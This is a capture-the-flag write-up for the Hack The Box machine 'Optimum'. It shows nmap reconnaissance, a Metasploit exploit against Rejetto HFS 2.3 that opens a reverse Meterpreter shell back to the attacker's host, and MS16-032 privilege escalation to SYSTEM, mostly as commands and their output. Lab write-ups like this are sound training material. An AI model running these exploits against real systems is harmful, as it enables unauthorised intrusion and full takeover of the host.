Contents

🕵 HTB-Writeup : OPTIMUM

Recon

scan nmap

With nmap we found only one open port (80). We identify a webserver.

1
2
3
4
5
6
7
8
# basic scan
nmap -sC -sV -p- -T5 10.10.10.8

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Website

We navigate on the website and, like identified by the nmap scan, we found a HFS (HttpFileServer) server version 2.3

drawing

Vulnerabilities

We search for vulnerabilities on exploitdb or metasploit.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
# exploitdb
searchsploit HFS 2.3
HFS (HTTP File Server) 2.3.x - Remote Command Execution

# msfconsole
msf6 > search HFS 2.3

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   1  exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

We find a well known vulnerability: rejetto_hfs_exec. Let’s try to get an access to the server !

Exploit

Entry point

We start the rejetto_hfs_exec module and run the exploit.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.16.6:4444 
[*] Using URL: http://10.10.16.6:8080/3D77WCI2aRHJnkl
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /3D77WCI2aRHJnkl
[*] Sending stage (175686 bytes) to 10.10.10.8
[*] Meterpreter session 3 opened (10.10.16.6:4444 -> 10.10.10.8:49213) at 2022-07-24 23:52:26 +0200
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\YSDfhnfRWto.vbs' on the target

C:\Users\kostas\Desktop> powershell.exe -c "whoami"
optimum\kostas

We are in ! We are connected with the user kostas. We can now get the user flag! Now we have to do a privesc to get the admin flag.

We first check system information with the sysinfo command.

1
2
3
4
5
6
7
8
meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows

This is a Windows Server 2012. With some research we find the CVE-2016-0099 that allows a connected user to privesc. We search first for a metasploit module.

privesc

1
2
3
4
5
6
7
8
msf6 > search CVE-2016-0099

Matching Modules
================

   #  Name                                                           Disclosure Date  Rank    Check  Description
   -  ----                                                           ---------------  ----    -----  -----------
   0  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  2016-03-21       normal  Yes    MS16-032 Secondary Logon Handle Privilege Escalation

There are a module let’s run the exploit ! We first background our first sessions.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
# create a session
meterpreter > background

# check for our session
msf6 > sessions

Active sessions
===============

  Id  Name  Type                     Information               Connection
  --  ----  ----                     -----------               ----------
  1         meterpreter x86/windows  OPTIMUM\kostas @ OPTIMUM  10.10.16.6:4445 -> 10.10.10.8:49426 (10.10.10.8)

msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

# configure options, dont forget to point to our session
msf6 > set session <ID session>
msf6 > exploit

C:\Users\kostas\Desktop>whoami
whoami
nt authority\system

The privesc works ! We are now system owner :)

Tags

Easy, External, HFS, Python, Penetration Tester Level 2, OS Command Injection, CVE-2014-6287, A03:2021-Injection, Network, CVE Exploitation, Public Vulnerabilities